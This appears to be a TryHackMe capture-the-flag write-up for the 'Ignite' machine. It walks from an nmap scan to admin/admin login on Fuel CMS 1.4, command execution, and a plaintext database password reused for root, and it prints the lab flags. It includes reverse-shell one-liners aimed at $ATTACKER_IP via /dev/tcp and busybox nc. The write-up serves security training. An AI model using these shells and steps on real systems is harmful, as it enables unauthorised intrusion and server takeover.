← back to writeups
platform TryHackMe
difficulty Easy

---

Ignite is an Easy Linux machine running Fuel CMS 1.4 — a content management system left on its default credentials and never updated past a known Remote Code Execution vulnerability. From the CMS admin panel, command injection drops a shell as www-data. A database config file holds a plaintext password, and whoever set this machine up reused it as the root account password.

Reconnaissance

Scan all ports first, then run service detection only on what is open. Scanning 65535 ports with -sC -sV is slow — running the full sweep at speed first and fingerprinting only confirmed ports cuts the total recon time significantly:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -p- -T4 --min-rate 1000 --open --max-retries 2 $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-21 13:10 UTC
Nmap scan report for $TARGET_IP
Host is up (0.030s latency).
Not shown: 65534 closed tcp ports (conn-refused)

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 42.17 seconds
kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -p 80 $TARGET_IP

Starting Nmap 7.94 ( https://nmap.org ) at 2026-08-21 13:11 UTC
Nmap scan report for $TARGET_IP
Host is up (0.030s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry:
|_/fuel/

Nmap done: 1 IP address (1 host up) scanned in 8.03 seconds

robots.txt already reveals the admin panel: /fuel/. Fuel CMS 1.4 is identified from the page title.

Exploitation — Default Credentials + RCE

Navigate to http://$TARGET_IP/fuel/ — the CMS admin login.

Try the default credentials that ship with Fuel CMS and are frequently never changed:

Username: admin
Password: admin

Login succeeds. Fuel CMS 1.4 has a known Remote Code Execution vulnerability in the admin interface — the "Pages" section passes unsanitised input directly to a system call. Commands entered execute as www-data:

Enter Command $ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Enter Command $ uname -a
Linux ubuntu 4.15.0-45-generic #48-Ubuntu SMP Tue Jan 29 16:28:13 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

Enter Command $ ls /home
www-data

Enter Command $ ls -la /home/www-data
total 24
drwxr-xr-x 2 root     root     4096 Jul 26  2019 .
drwxr-xr-x 3 root     root     4096 Jul 26  2019 ..
-rw-r--r-- 1 www-data www-data   33 Jul 26  2019 flag.txt

Enter Command $ less /home/www-data/flag.txt
6470e394cbf6dab6a91682cc8585059b

Credential Discovery

CMS installations almost always have a database configuration file with plaintext credentials. For Fuel CMS:

Enter Command $ less fuel/application/config/database.php

<?php
defined('BASEPATH') OR exit('No direct script access allowed');

$active_group = 'default';
$query_builder = TRUE;

$db['default'] = array(
	'dsn'	=> '',
	'hostname' => 'localhost',
	'username' => 'root',
	'password' => 'mememe',
	'database' => 'fuel_schema',
	'dbdriver' => 'mysqli',
	...
);

Password found: mememe. Database credentials are frequently reused as system account passwords — test this immediately after finding any config credential.

Reverse Shell

The web command panel works for reading files but an interactive shell is more practical for further enumeration. Catch a reverse shell:

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ nc -nlvp 4444

listening on [any] 4444 ...

Send from the command panel:

Enter Command $ sh -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1

If filtered, busybox nc works as a fallback — it includes a built-in -e flag that many stripped-down nc binaries lack:

Enter Command $ busybox nc $ATTACKER_IP 4444 -e sh

Listener receives:

connect to [$ATTACKER_IP] from (UNKNOWN) [$TARGET_IP] 52142
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Upgrade to a full TTY:

$ python3 -c 'import pty; pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html$ ^Z
[1]+  Stopped                 nc -nlvp 4444

kali㉿kali: ~
┌──(kali㉿kali)-[~]
└─$ stty raw -echo; fg
nc -nlvp 4444

www-data@ubuntu:/var/www/html$ export TERM=xterm
www-data@ubuntu:/var/www/html$

Privilege Escalation — Credential Reuse

www-data@ubuntu:/var/www/html$ su root
Password: mememe

root@ubuntu:/var/www/html# id
uid=0(root) gid=0(root) groups=0(root)

root@ubuntu:/var/www/html# cat /root/root.txt
b9bbcb33e11b80be759c4e844862482d

The database password worked directly as the root account password. No exploit required.

Key Takeaways

  • Scan all ports with -p- before running service detection. Use --min-rate 1000 to keep the full sweep fast, then run -sC -sV only on confirmed open ports — this combination is significantly faster than running a full script scan across all 65535 ports.
  • Default credentials must always be tried before any exploitation. admin/admin is the single most common CMS misconfiguration and works far more often than it should.
  • robots.txt Disallow entries are not security controls — they tell search crawlers what to skip and simultaneously advertise those paths to attackers.
  • Database config files (database.php, .env, config.php, settings.py) almost always contain plaintext credentials. They are the first thing to look for after gaining any code execution.
  • Password reuse between database accounts and system accounts is extremely common. Any credential found anywhere should be tested immediately against su, SSH, and other local accounts.
  • Save full command outputs. Partial output is not evidence — for an OSCP report or a writeup, you need the complete response including the prompt, the full output, and the flag itself.

References